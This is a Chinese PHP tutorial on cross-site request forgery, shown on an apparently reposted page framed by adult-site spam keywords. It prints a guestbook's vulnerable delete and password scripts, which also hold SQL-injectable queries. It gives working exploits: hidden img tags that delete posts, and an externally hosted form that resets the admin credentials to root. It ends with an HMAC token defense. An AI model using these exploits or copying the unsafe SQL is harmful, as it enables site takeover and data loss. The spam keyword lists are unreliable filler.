一区二区久久-一区二区三区www-一区二区三区久久-一区二区三区久久精品-麻豆国产一区二区在线观看-麻豆国产视频

php漏洞之跨網(wǎng)站請(qǐng)求偽造與防止偽造方法

偽造跨站請(qǐng)求介紹
偽造跨站請(qǐng)求比較難以防范,而且危害巨大,攻擊者可以通過(guò)這種方式惡作劇,發(fā)spam信息,刪除數(shù)據(jù)等等。這種攻擊常見的表現(xiàn)形式有:
  偽造鏈接,引誘用戶點(diǎn)擊,或是讓用戶在不知情的情況下訪問(wèn)
  偽造表單,引誘用戶提交。表單可以是隱藏的,用圖片或鏈接的形式偽裝。
  比較常見而且也很廉價(jià)的防范手段是在所有可能涉及用戶寫操作的表單中加入一個(gè)隨機(jī)且變換頻繁的字符串,然后在處理表單的時(shí)候?qū)@個(gè)字符串進(jìn)行檢查。這個(gè)隨機(jī)字符串如果和當(dāng)前用戶身份相關(guān)聯(lián)的話,那么攻擊者偽造請(qǐng)求會(huì)比較麻煩。
如果攻擊者以隱藏的方式發(fā)送給目標(biāo)用戶鏈接
<img src="/buy.php?item=watch&num=1000"/>,那么如果目標(biāo)用戶不小心訪問(wèn)以后,購(gòu)買的數(shù)量就成了1000個(gè)
實(shí)例
隨緣網(wǎng)絡(luò)php留言板V1.0
復(fù)制代碼 代碼如下:
任意刪除留言
//delbook.php 此頁(yè)面用于刪除留言
<?php
include_once("dlyz.php");    //dlyz.php用戶驗(yàn)證權(quán)限,當(dāng)權(quán)限是admin的時(shí)候方可刪除留言
include_once("../conn.php");
$del=$_GET["del"];
$id=$_GET["id"];
if ($del=="data")
{
$ID_Dele= implode(",",$_POST['adid']);
$sql="delete from book where id in (".$ID_Dele.")";
mysql_query($sql);
}
else
{
$sql="delete from book where id=".$id; //傳遞要?jiǎng)h除的留言ID
mysql_query($sql);
}
mysql_close($conn);
echo "<script language='Javascript'>";
echo "alert('刪除成功!');";
echo " location='book.php';";
echo "</script>";
?>

當(dāng)我們具有admin權(quán)限,提交http://localhost/manage/delbook.php?id=2 時(shí),就會(huì)刪除id為2的留言
利用方法:
我們使用普通用戶留言(源代碼方式),內(nèi)容為
復(fù)制代碼 代碼如下:
<img src="delbook.php?id=2" />
<img src="delbook.php?id=3" />
<img src="delbook.php?id=4" />
<img src="delbook.php?id=5" />

插入4張圖片鏈接分別刪除4個(gè)id留言,然后我們返回首頁(yè)瀏覽看,沒有什么變化。。圖片顯示不了
現(xiàn)在我們?cè)儆霉芾韱T賬號(hào)登陸后,來(lái)刷新首頁(yè),會(huì)發(fā)現(xiàn)留言就剩一條,其他在圖片鏈接中指定的ID號(hào)的留言,全部都被刪除。
攻擊者在留言中插入隱藏的圖片鏈接,此鏈接具有刪除留言的作用,而攻擊者自己訪問(wèn)這些圖片鏈接的時(shí)候,是不具有權(quán)限的,所以看不到任何效果,但是當(dāng)管理員登陸后,查看此留言,就會(huì)執(zhí)行隱藏的鏈接,而他的權(quán)限又是足夠大的,從而這些留言就被刪除了
修改管理員密碼
復(fù)制代碼 代碼如下:
//pass.php
if($_GET["act"])
{
$username=$_POST["username"];
$sh=$_POST["sh"];
$gg=$_POST["gg"];
$title=$_POST["title"];
$copyright=$_POST["copyright"]."<br/>網(wǎng)站:<a href=http://www.jb51.NET>腳本之家</a>";
$password=md5($_POST["password"]);
if(empty($_POST["password"]))
{
$sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
else
{
$sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
mysql_query($sql);
mysql_close($conn);
echo "<script language='Javascript'>";
echo "alert('修改成功!');";
echo " location='pass.php';";
echo "</script>";
}
這個(gè)文件用于修改管理密碼和網(wǎng)站設(shè)置的一些信息,我們可以直接構(gòu)造如下表單:
<body>
<form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
<input type="radio" value="1"  name="sh">
<input type="radio" name="sh" checked value="0">
<input type="text" name="username" value="root">
<input type="password" name="password" value="root">
<input type="text"  name="title"  value="隨緣網(wǎng)絡(luò)php留言板V1.0(帶審核功能)" >
<textarea  name="gg"  rows="6" cols="80" >歡迎您安裝使用隨緣網(wǎng)絡(luò)php留言板V1.0(帶審核功能)!</textarea>
<textarea  name="copyright"  rows="6" cols="80" >隨緣網(wǎng)絡(luò)php留言本V1.0  版權(quán)所有:廈門隨緣網(wǎng)絡(luò)科技 2005-2009<br/>承接網(wǎng)站建設(shè)及系統(tǒng)定制 提供優(yōu)惠主機(jī)域名</textarea>
</form>
</body>

存為attack.html,放到自己網(wǎng)站上http://www.jb51.NET此頁(yè)面訪問(wèn)后會(huì)自動(dòng)向目標(biāo)程序的pass.php提交參數(shù),用戶名修改為root,密碼修改為root,然后我們?nèi)チ粞园灏l(fā)一條留言,隱藏這個(gè)鏈接,管理訪問(wèn)以后,他的用戶名和密碼全部修改成了root
防止偽造跨站請(qǐng)求
yahoo對(duì)付偽造跨站請(qǐng)求的辦法是在表單里加入一個(gè)叫.crumb的隨機(jī)串;而facebook也有類似的解決辦法,它的表單里常常會(huì)有post_form_id和fb_dtsg。
隨機(jī)串代碼實(shí)現(xiàn)
咱們按照這個(gè)思路,山寨一個(gè)crumb的實(shí)現(xiàn),代碼如下:
復(fù)制代碼 代碼如下:
<?php
class Crumb {
CONST SALT = "your-secret-salt";
static $ttl = 7200;
static public function challenge($data) {
return hash_hmac('md5', $data, self::SALT);
}
static public function issueCrumb($uid, $action = -1) {
$i = ceil(time() / self::$ttl);
return substr(self::challenge($i . $action . $uid), -12, 10);
}
static public function verifyCrumb($uid, $crumb, $action = -1) {
$i = ceil(time() / self::$ttl);
if(substr(self::challenge($i . $action . $uid), -12, 10) == $crumb ||
substr(self::challenge(($i - 1) . $action . $uid), -12, 10) == $crumb)
return true;
return false;
}
}

代碼中的$uid表示用戶唯一標(biāo)識(shí),而$ttl表示這個(gè)隨機(jī)串的有效時(shí)間。
  應(yīng)用示例
  構(gòu)造表單
  在表單中插入一個(gè)隱藏的隨機(jī)串crumb
復(fù)制代碼 代碼如下:
<form method="post" action="demo.php">
<input type="hidden" name="crumb" value="<?php echo Crumb::issueCrumb($uid)?>">
<input type="text" name="content">
<input type="submit">
</form>

處理表單 demo.php
  對(duì)crumb進(jìn)行檢查
復(fù)制代碼 代碼如下:
<?php
if(Crumb::verifyCrumb($uid, $_POST['crumb'])) {
//按照正常流程處理表單
} else {
//crumb校驗(yàn)失敗,錯(cuò)誤提示流程
}
?>

php技術(shù)php漏洞之跨網(wǎng)站請(qǐng)求偽造與防止偽造方法,轉(zhuǎn)載需保留來(lái)源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 正在播放国产夫妻 | 一级做a级爰片性色毛片视频 | 精品国产欧美精品v | 看美女毛片 | 精品国产国产综合精品 | 色综合五月激情综合色一区 | 久久综合亚洲 | 91免费视频国产 | 天天天色综合 | 国产在线视频区 | 精品欧美一区二区在线观看 | 大杳蕉伊人狼人久久一本线 | 美女黄色免费看 | 国产一起色一起爱 | 普通话对白国产情侣自啪 | 国产精品女人在线观看 | 色视频网站在线观看 | 91成人午夜精品福利院在线观看 | 欧美日韩国产亚洲一区二区三区 | 国产一区国产二区国产三区 | 色多多成视频人在线观看 | 国产精自产拍久久久久久蜜 | 国产xh98hx在线观看 | 性开放视频| 黄色国产在线观看 | 亚洲美女视频网址 | 狠狠久久久久久亚洲综合网 | 午夜噜噜噜 | 日本加勒比一区 | 久久久精品免费 | 五月婷婷激情视频 | 亚洲精品国产自在久久老牛 | 黄色激情视频在线观看 | 色综合久久六月婷婷中文字幕 | www.日本高清| 色婷婷在线播放 | 四虎影永久在线高清免费 | 亚洲香蕉久久一区二区三区四区 | 久久免费公开视频 | 一二三区在线视频 | 玖玖99视频 |